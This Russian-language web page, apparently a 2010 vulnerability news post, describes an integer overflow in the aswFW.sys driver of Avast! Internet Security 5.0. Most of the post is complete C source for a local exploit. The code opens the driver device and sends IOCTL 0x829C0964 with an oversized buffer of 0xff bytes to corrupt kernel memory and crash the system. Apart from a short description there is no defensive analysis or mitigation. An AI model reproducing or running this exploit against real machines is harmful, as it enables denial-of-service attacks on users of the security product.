Меню сайта
Разделы новостей
Наш опрос
Главная » 2010 » Август » 11 » Эксплоит для Avast! Internet Security 5.0
Эксплоит для Avast! Internet Security 5.0
16:51
Цель:
Avast! Internet Security 5.0
Воздействие: Отказ в обслуживании Целочисленное переполнение обнаружено в драйвере устройства aswFW.sys.
Локальный пользователь может с помощью специально сформированного
0x829C0964 IOCTL запроса вызвать повреждение памяти и аварийно завершить
работу приложения.
#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#include "stdio.h"
int main(void)
{
HANDLE hFile = NULL;
ULONG ioctl_code = 0;
CHAR outBuf[32];
CHAR rpt_inBuf[102400];
DWORD dwRet = 0, ret = 0;
hFile = CreateFile("\\\\.\\aswFW", FILE_SHARE_READ |
FILE_SHARE_WRITE,
0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,
NULL);
if(hFile == INVALID_HANDLE_VALUE){
fprintf(stderr, "failed to open 'aswFW.sys' kernel
driver!\n");
return(-1);
}
rpt_inBuf[0] = '\xff'; // first 4 byte wiil uses calculate
rpt_inBuf[1] = '\xff'; // allication size of ExAllocatePoolWithTag.
rpt_inBuf[2] = '\xff'; // and it is [Irp+0Ch] as User Controlled
Buffer.
rpt_inBuf[3] = '\xff';
memset((rpt_inBuf+4), 0xff, 102394);
// IOCTL Code = 0x829C0964 ( IOCTL_ASWFW_COMM_PIDINFO_RESULTS )
// ( another IOCTL Code also vulnerable )
ret = DeviceIoControl(hFile, 0x829C0964,
(PVOID)rpt_inBuf, 102398, outBuf, 32, &dwRet, NULL);
return 0;
}
Категория: Уязвимости |
Просмотров: 687 |
Добавил: Sgw32
| Рейтинг: 0.0/0 |
- Оценить -
Отлично
Хорошо
Неплохо
Плохо
Ужасно
Добавлять комментарии могут только зарегистрированные пользователи.
[
Регистрация |
Вход ]
Форма входа
Календарь новостей
« Август 2010 » Пн Вт Ср Чт Пт Сб Вс 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
Поиск
Друзья сайта
Limit Calculator
Статистика